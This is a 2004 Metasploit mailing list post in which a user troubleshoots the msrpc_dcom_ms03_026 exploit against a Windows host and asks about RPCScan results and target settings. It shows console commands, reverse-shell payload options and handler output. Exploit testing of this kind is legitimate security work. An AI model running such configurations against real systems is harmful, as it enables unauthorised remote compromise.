Metasploit mailing list archives
RPCScan v2.03 vs exploit msrpc_dcom_ms03_026
From: itorres at litronic.com (Israel Torres)
Date: Thu, 19 Aug 2004 07:25:27 -0700
Hi, 2 questions: I have run *Foundstone's RPCScan v2.03 on a SP4 system to find that it is resulting in VULNERABLE. When I use and configure msrpc_dcom_ms03_026 (with either win32_reverse, or win32_reverse_vncinject) The following error is returned: msf msrpc_dcom_ms03_026(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Connected to REMACT with group ID 0x6317 [*] Exiting Reverse Handler. I have run this exploit on this machine unpatched and it operated as expected (successfully exploitable with either payload above). Is foundstone's tool just not working correctly? (as it seems) The last question I have been unable to find an answer for is setting the TARGET does not work by simply stating: set TARGET 2K set TARGET Windows 2K since both result in Target: Target Not Specified only set TARGET ALL will configure for Target: Windows NT SP6/2K/XP ALL Thanks for your help, Israel Torres Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------- ------------------ required RHOST itest The target address required RPORT 135 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ optional EXITFUNC seh Exit technique: "process", "thread", "seh" required LHOST itorres Local address to receive connection required LPORT 4321 Local port to receive connection Target: Windows NT SP6/2K/XP ALL REF:----------------------------- References: *RPCScan v2.03 <http://www.foundstone.com/images/clear.gif> RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins. http://www.foundstone.com/resources/termsofuse.htm?file=rpcscan2.zip -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20040819/e4c82bbf/attachment.htm>
Current thread:
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Israel Torres (Aug 19)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 H D Moore (Aug 19)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 odinanne (Aug 20)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Carric Dooley (Aug 21)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 H D Moore (Aug 19)